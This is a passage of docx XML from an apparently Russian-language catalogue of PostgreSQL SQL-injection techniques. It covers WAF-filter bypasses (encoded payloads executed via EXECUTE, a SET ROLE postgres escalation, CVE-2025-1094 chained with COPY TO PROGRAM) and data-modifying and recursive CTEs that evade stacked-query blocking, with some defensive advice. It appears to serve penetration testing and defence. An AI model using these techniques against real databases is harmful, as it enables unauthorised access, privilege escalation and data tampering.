        <w:t xml:space="preserve"> — пограничные случаи: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3.9.6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whitespace) vs 3.12.1 (вложенные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 атака на парсер комментариев) — закреплено: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обхода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-фильтра — в 3.9.6; nested-comments — в 3.12.1.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3.9.6 Payload B (CR как разделитель токенов) vs 3.12.2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CRLF — атака на парсер однострочного комментария) — близко, но разные цели.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 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.9.5 + EXECUTE в DO для построения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE postgres; ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без подстроки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в payload-тексте.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3.9.5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode + convert_from + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — наиболее компактный путь обойти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-валидацию (3.16.2). 3.9.6 case-mix — нагрузка на семантику unquoted identifier-ов: PG приводит к lower-case, поэтому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(но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 — полный разбор CVE-2025-1094: CVSS 8.1, цепочка с CVE-2024-12356 (BeyondTrust), Rapid7 disclosure, patch-окно 13 февраля 2025.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4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2025-1094 + COPY TO PROGRAM (R21) — двухступенчатый exploit.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5.5 (Конфиги PostgreSQL)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standard_conforming_strings = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (дефолт PG 9.1+) — необходимое условие, чтобы обычные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-литералы не превращались в E-string-семантику; если </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3.9.4 escape применяется и к не-E литералам, что радикально расширяет поверхность.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практический ответ на 3.9: параметризация (где работает), AST-валидация payload-ов, whitelist по конечному набору значений для ORDER BY / LIMIT — там, где параметризация не помогает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9 — это категория про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-layer фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WAF (Cloudflare, AWS WAF, ModSecurity на API gateway), sanitizer-функции в коде приложения, blacklist на REST-параметрах. Managed-PG (AWS RDS, Google Cloud SQL, Supabase) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не предоставляет input-WAF для SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — он живёт перед бэкендом приложения, не перед PG. Поэтому 3.9 целиком ортогонален managed-PG: приёмы работают идентично self-hosted, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсер PG один и тот же</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Нюансы по компонентам managed-стэка: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PgBouncer / RDS Proxy / Cloud SQL Auth Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — connection-poolers, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Они не парсят SQL (PgBouncer transaction-mode максимум смотрит на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN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COMMIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-границы для пула; RDS Proxy и Cloud SQL Auth Proxy — на auth и TLS-уровне). Payload проходит через них байт-в-байт. 3.9 на них никак не влияет.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Supabase PostgREST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — REST → SQL генератор, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ограничивает поверхность атаки тем, что user-input не идёт в raw SQL — PostgREST строит запрос из DSL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">?column=eq.value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). 3.9 неприменим к PostgREST-эндпоинтам как класс (нет raw-SQL builder-а). Применимо только к custom RPC-функциям с динамическим SQL внутри plpgsql (там — см. 3.16).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Supabase Database Functions / RDS / Cloud SQL custom extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если приложение использует raw SQL внутри plpgsql-функций (через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3.9 применим к ним так же, как к application-коду.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Managed-providers с `standard_conforming_strings = off`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — теоретический вектор для 3.9.4 (backslash-escape применяется к обычным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-литералам). На современных managed-инстансах (RDS PG 13+, Cloud SQL PG 13+, Supabase) дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Кластеры с </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 почти исключительно legacy RDS PG 9.x, которые на момент 2026 EOL и за пределами поддерживаемого периода. Перед атакой проверяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW standard_conforming_strings;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PUBLIC).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managed-провайдеров</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (AWS WAF managed rule groups, Cloud Armor SQL injection ruleset) — это application-layer перед бэкендом, не PG-провайдер сам по себе. Их сигнатуры калибруются отдельно; общие принципы 3.9 применимы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: для managed-PG в контексте 3.9 ничего специфичного — приёмы работают одинаково, провайдер не вмешивается в лексер. Внимание стоит уделить только проверке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">standard_conforming_strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на legacy-кластерах (актуально для 3.9.4) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SHOW server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для проверки patch-окна 3.9.7 (CVE-2025-1094) на тех машинах, где запущен psql.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.10 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CTE-based атаки и побочные эффекты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: использование конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (...) SELECT/INSERT/UPDATE/DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которая в PG не просто синтаксический сахар, а полноправный механизм с уникальными свойствами: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CTE может содержать DML с RETURNING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WITH ins AS (INSERT INTO t VALUES (...) RETURNING id) SELECT id FROM ins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-команда выполняет write и возвращает результат. Это превращает SELECT-эндпоинт в эндпоинт записи без необходимости в stacked queries.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CTE — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> команда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для PG-парсера. На уровне wire-protocol (см. 2.1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (UPDATE ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт как один Parse/Bind/Execute — extended-protocol-блокировки stacked-queries (см. 3.5) её не останавливают.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Recursive CTE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WITH RECURSIVE r(n) AS (SELECT 1 UNION ALL SELECT n+1 FROM r WHERE n&lt;N) SELECT...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — генерирует delay без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полезно когда WAF блокирует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(см. 3.9.0).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CTE-материализация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> контролирует optimizer plan: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH x AS MATERIALIZED (...) ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> принуждает плановщик к материализации (фенс между CTE-телом и внешним запросом); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наоборот, разрешает inline (дефолт с PG 12). Это критично для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">leaky views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий контролирует, применится ли view-фильтр до или после его инжектированного leaky-предиката.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с 3.5 (stacked queries)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">stacked queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — несколько команд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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">data-modifying CTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одна команда с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (INSERT|UPDATE|DELETE ...) SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Различие практическое: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3.5 (stacked) блокируется extended-protocol drivers (psycopg3 default, asyncpg c parameters, pgjdbc default) — сервер режет multi-statement Parse.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3.10.1 (DML в CTE) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не блокируется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одна команда, проходит через любой protocol. Это делает 3.10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сильнее</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, чем 3.5, в большинстве современных стэков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
